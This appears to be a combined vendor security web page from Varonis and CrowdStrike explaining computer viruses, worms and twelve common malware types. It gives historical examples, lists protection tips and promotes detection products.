What type of malware is self-replicating?

Viruses and worms are often used interchangeably: there are a few key differences in how they work. Both viruses and worms are a type of malware: a worm is a type of virus.

What is a Computer Virus?

Computer viruses are named after human viruses that spread from person to person. A computer virus is a program made of malicious code that can propagate itself from device to device. Like a cold that alters your well-being, when your computer is infected, it alters the way your computer operates, can destroy your files, or prevent it from working altogether.

A virus typically attaches itself to a program, file, or the boot sector of the hard drive. Once the virus attaches itself to that file or program (aka, the host), they’re infected.

When the infected application or file runs in the computer, the virus activates and executes in the system. It continues to replicate and spread by attaching replicas of itself to other files and applications in the system.

How Does a Computer Virus Spread?

A virus spreads when the infected file or program migrates through networks, file collaboration apps, email attachments, and USB drives. Once a user opens the infected file or program, the vicious cycle repeats itself all over again.

Typically, the host program continues to function after the viral infection, but some viruses overwrite entire programs with copies of themselves, which corrupts and destroys the host program altogether. Viruses can also attack data: they can disrupt access, corrupt, and/or destroy your data.

What’s a Computer Worm?

Worms are a self-replicating type of malware (and a type of virus) that enter networks by exploiting vulnerabilities, moving quickly from one computer to another. Because of this, worms can propagate themselves and spread very quickly – not only locally, but have the potential to disrupt systems worldwide.

Unlike a typical virus, worms don’t attach to a file or program. Instead, they slither and enter computers through a vulnerability in the network, self-replicating and spreading before you’re able to remove the worm. But by then, they’ll already have consumed all the bandwidth of the network, interrupting and arresting large network and web servers.

A Modern Computer Worm Story

In 2017, the WannaCry worm attack caused damage worth hundreds of millions to billions of dollars. Also known as WannaCry ransomware, this attack is a hybrid of ransomware and a worm – specifically cryptoworm.

Ransomware is a type of malware that holds a user’s data hostage: it encrypts data and asks the victim to pay a ransom, betting on the user’s willingness to pay to restore the user’s data. Ransomware infections often occur through phishing campaigns.

Instead, WannaCry took advantage of a vulnerability in Microsoft’s SMB Version 1 file sharing protocol, typically used by Windows machines to communicate with file systems over a network. Those who didn’t patch SMB Version 1 learned the hard way about the perils of forgetting to patch their systems.

WannaCry leveraged EternalBlue, a Windows SMB protocol exploit, to gain access, install a backdoor, and download software –  infecting the systems.

In short, WannaCry self-propagated, self-replicated, and quickly traversed entire networks, causing worldwide damage.

How to Protect Yourself from Computer Viruses and Computer Worms

Here are some simple ways to protect yourself:

• Install anti-virus software and firewall
• Track potential data exfiltration at the edge and attacks at the point of entry
• Remember to regularly install security patches
• Monitor and analyze file and user behavior
• Leverage security analytics to spot suspicious behavior
• Set up alerts to notify you automatically and immediately when an anomaly occurs

How Varonis Helps

When a virus or worm evades your anti-virus detection software or endpoint to exfilitrate your organization’s data, Varonis can help.

Varonis DatAdvantage monitors and analyzes file and email activity – as well as user behavior. When there’s an unusual amount of lockouts that occur or a thousand files are opened in a minute, Varonis DatAlert can detect these anomalies, automate security responses, and enable teams to investigate security incidents directly in the web UI. Varonis Edge adds context with perimeter telemetry, detecting signs of attack at the perimeter via DNS, VPN, and Web Proxies.

Discover how Varonis can help defend against worms and viruses – see Varonis in action with a 1:1 demo today.

While there are many different variations of malware, you are most likely to encounter the following malware types:

Below, we describe how they work and provide real-world examples of each.

1. Ransomware

Ransomware is software that uses encryption to disable a target’s access to its data until a ransom is paid. The victim organization is rendered partially or totally unable to operate until it pays, but there is no guarantee that payment will result in the necessary decryption key or that the decryption key provided will function properly.

Example of a ransom letter

Ransomware Example:

This year, the city of Baltimore was hit by a type of ransomware named RobbinHood, which halted all city activities, including tax collection, property transfers, and government email for weeks. This attack has cost the city more than $18 million so far, and costs continue to accrue. The same type of malware was used against the city of Atlanta in 2018, resulting in costs of $17 million.

2. Fileless Malware

Fileless malware doesn’t install anything initially, instead, it makes changes to files that are native to the operating system, such as PowerShell or WMI. Because the operating system recognizes the edited files as legitimate, a fileless attack is not caught by antivirus software — and because these attacks are stealthy, they are up to ten times more successful than traditional malware attacks.

Fileless Malware Example:

Astaroth is a fileless malware campaign that spammed users with links to a .LNK shortcut file. When users downloaded the file, a WMIC tool was launched, along with a number of other legitimate Windows tools. These tools downloaded additional code that was executed only in memory, leaving no evidence that could be detected by vulnerability scanners. Then the attacker downloaded and ran a Trojan that stole credentials and uploaded them to a remote server.

Download our white paper to get a detailed anatomy of a fileless intrusion.

3. Spyware

Spyware collects information about users’ activities without their knowledge or consent. This can include passwords, pins, payment information and unstructured messages.

The use of spyware is not limited to the desktop browser: it can also operate in a critical app or on a mobile phone.

Even if the data stolen is not critical, the effects of spyware often ripple throughout the organization as performance is degraded and productivity eroded.

Spyware Example:

DarkHotel, which targeted business and government leaders using hotel WIFI, used several types of malware in order to gain access to the systems belonging to specific powerful people. Once that access was gained, the attackers installed keyloggers to capture their targets passwords and other sensitive information.

4. Adware

Adware tracks a user’s surfing activity to determine which ads to serve them. Although adware is similar to spyware, it does not install any software on a user’s computer, nor does it capture keystrokes.

The danger in adware is the erosion of a user’s privacy — the data captured by adware is collated with data captured, overtly or covertly, about the user’s activity elsewhere on the internet and used to create a profile of that person which includes who their friends are, what they’ve purchased, where they’ve traveled, and more. That information can be shared or sold to advertisers without the user’s consent.

Adware Example:

Adware called Fireball infected 250 million computers and devices in 2017, hijacking browsers to change default search engines and track web activity. However, the malware had the potential to become more than a mere nuisance. Three-quarters of it was able to run code remotely and download malicious files.

Download CrowdInspect: a free community tool for Microsoft Windows systems that is aimed to help alert you to the presence of potential malware are on your computer that may be communicating over the network.Download CrowdInspect

5. Trojan

A Trojan disguises itself as desirable code or software. Once downloaded by unsuspecting users, the Trojan can take control of victims’ systems for malicious purposes. Trojans may hide in games, apps, or even software patches, or they may be embedded in attachments included in phishing emails.

Trojan Example:

Emotet is a sophisticated banking trojan that has been around since 2014. It is hard to fight Emotet because it evades signature-based detection, is persistent, and includes spreader modules that help it propagate. The trojan is so widespread that it is the subject of a US Department of Homeland Security alert, which notes that Emotet has cost state, local, tribal and territorial governments up to $1 million per incident to remediate.

TrickBot malware is a type of banking Trojan released in 2016 that has since evolved into a modular, multi-phase malware capable of a wide variety of illicit operations. Learn more about what makes TrickBot highly concerning here.Read: What is TrickBot Malware

6. Worms

Worms target vulnerabilities in operating systems to install themselves into networks. They may gain access in several ways: through backdoors built into software, through unintentional software vulnerabilities, or through flash drives. Once in place, worms can be used by malicious actors to launch DDoS attacks, steal sensitive data, or conduct ransomware attacks.

Worm Example:

Stuxnet was probably developed by the US and Israeli intelligence forces with the intent of setting back Iran’s nuclear program. It was introduced into Iran’s environment through a flash drive. Because the environment was air-gapped, its creators never thought Stuxnet would escape its target’s network — but it did. Once in the wild, Stuxnet spread aggressively but did little damage, since its only function was to interfere with industrial controllers that managed the uranium enrichment process.

Want to stay up to date on recent adversary activities? Stop by the Research and Threat Intel Blog for the latest research, trends, and insights on emerging cyber threats.Research and Threat Intel Blog

7. Virus

A virus is a piece of code that inserts itself into an application and executes when the app is run. Once inside a network, a virus may be used to steal sensitive data, launch DDoS attacks or conduct ransomware attacks.

Viruses vs. Trojans 

A virus cannot execute or reproduce unless the app it has infected is running. This dependence on a host application makes viruses different from trojans, which require users to download them, and worms, which do not use applications to execute. Many instances of malware fit into multiple categories: for instance, Stuxnet is a worm, a virus and a rootkit.

8. Rootkits

A rootkit is software that gives malicious actors remote control of a victim’s computer with full administrative privileges. Rootkits can be injected into applications, kernels, hypervisors, or firmware. They spread through phishing, malicious attachments, malicious downloads, and compromised shared drives. Rootkits can also be used to conceal other malware, such as keyloggers.

Rootkit Example:

Zacinlo infects systems when users download a fake VPN app. Once installed, Zacinlo conducts a security sweep for competing malware and tries to remove it. Then it opens invisible browsers and interacts with content like a human would — by scrolling, highlighting and clicking. This activity is meant to fool behavioral analysis software. Zacinlo’s payload occurs when the malware clicks on ads in the invisible browsers. This advertising click fraud provides malicious actors with a cut of the commission.

Blog Post on Machine Learning & Malware Defense: Learn where machine learning can be most valuable and serve as an effective tool against both known and unknown malware. Read Blog

9. Keyloggers

A keylogger is a type of spyware that monitors user activity. Keyloggers have legitimate uses; businesses can use them to monitor employee activity and families may use them to keep track of children’s online behaviors.

However, when installed for malicious purposes, keyloggers can be used to steal password data, banking information and other sensitive information. Keyloggers can be inserted into a system through phishing, social engineering or malicious downloads.

Keylogger Example:

A keylogger called Olympic Vision has been used to target US, Middle Eastern and Asian businessmen for business email compromise (BEC) attacks. Olympic Vision uses spear-phishing and social engineering techniques to infect its targets’ systems in order to steal sensitive data and spy on business transactions. The keylogger is not sophisticated, but it’s available on the black market for $25 so it’s highly accessible to malicious actors.

Download the 2022 Global Threat Report to find out how security teams can better protect the people, processes, and technologies of a modern enterprise in an increasingly ominous threat landscape.

10. Bots/Botnets

A bot is a software application that performs automated tasks on command. They’re used for legitimate purposes, such as indexing search engines, but when used for malicious purposes, they take the form of self-propagating malware that can connect back to a central server.

Usually, bots are used in large numbers to create a botnet, which is a network of bots used to launch broad remotely-controlled floods of attacks, such as DDoS attacks. Botnets can become quite expansive. For example, the Mirai IoT botnet ranged from 800,000 to 2.5M computers.

Botnet Example:

Echobot is a variant of the well-known Mirai. Echobot attacks a wide range of IoT devices, exploiting over 50 different vulnerabilities, but it also includes exploits for Oracle WebLogic Server and VMWare’s SD-Wan networking software. In addition, the malware looks for unpatched legacy systems. Echobot could be used by malicious actors to launch DDoS attacks, interrupt supply chains, steal sensitive supply chain information and conduct corporate sabotage.

11. Mobile Malware

Attacks targeting mobile devices have risen 50 percent since last year. Mobile malware threats are as various as those targeting desktops and include Trojans, ransomware, advertising click fraud and more. They are distributed through phishing and malicious downloads and are a particular problem for jailbroken phones, which tend to lack the default protections that were part of those devices’ original operating systems.

Mobile Malware Example:

Triada is a rooting Trojan that was injected into the supply chain when millions of Android devices shipped with the malware pre-installed. Triada gains access to sensitive areas in the operating system and installs spam apps. The spam apps display ads, sometimes replacing legitimate ads. When a user clicks on one of the unauthorized ads, the revenue from that click goes to Triada’s developers.

12. Wiper Malware

A wiper is a type of malware with a single purpose: to erase user data and ensure it can’t be recovered. Wipers are used to take down computer networks in public or private companies across various sectors. Threat actors also use wipers to cover up traces left after an intrusion, weakening their victim’s ability to respond.

Wiper Malware Example:

On Jan. 15, 2022, a set of malware dubbed WhisperGate was reported to have been deployed against Ukrainian targets. The incident is widely reported to contain three individual components deployed by the same adversary, including a malicious bootloader that corrupts detected local disks, a Discord-based downloader and a file wiper. The activity occurred at approximately the same time multiple websites belonging to the Ukrainian government were defaced. Learn more>

Download the latest mobile threat report to explore why the targeting of mobile platforms is being increasingly adopted

Malware Detection and Removal with CrowdStrike

The best approach to protect against malware is to employ a unified array of methods. Machine learning, exploit blocking, whitelisting and blacklisting, and indicators of attack (IOCs) should all be part of every organization’s anti-malware strategy.

CrowdStrike Falcon® combines these methods with innovative technologies that run in the cloud for faster, more up-to-the-minute defenses.

The CrowdStrike Falcon® platform gives analysts and threat researchers rapid and comprehensive malware search capabilities through access to the largest and most active repository of threat events and artifacts in the industry. The repository contains a 300TB collection with over 400 million files and indexes over 2 trillion events each week.

All of this data is available for real-time search — both metadata and binary content — made possible within seconds by patent-pending indexing technology.

Deep analysis of evasive and unknown threats is a reality with Falcon Sandbox. Falcon Sandbox enriches malware search results with threat intelligence and delivers actionable IOCs, so security teams can better understand sophisticated malware attacks and strengthen their defenses.

To battle the growing threat of mobile malware, organizations need visibility into which devices are accessing their networks and how they’re doing it. CrowdStrike’s Falcon for Mobile delivers mobile endpoint detection and response with real-time visibility into IP addresses, device settings, WIFI and Bluetooth connections, and operating system information.

Want to see how the CrowdStrike Falcon® Platform blocks malware? Start a free trial and see how it performs against live malware samples.

Start Free Trial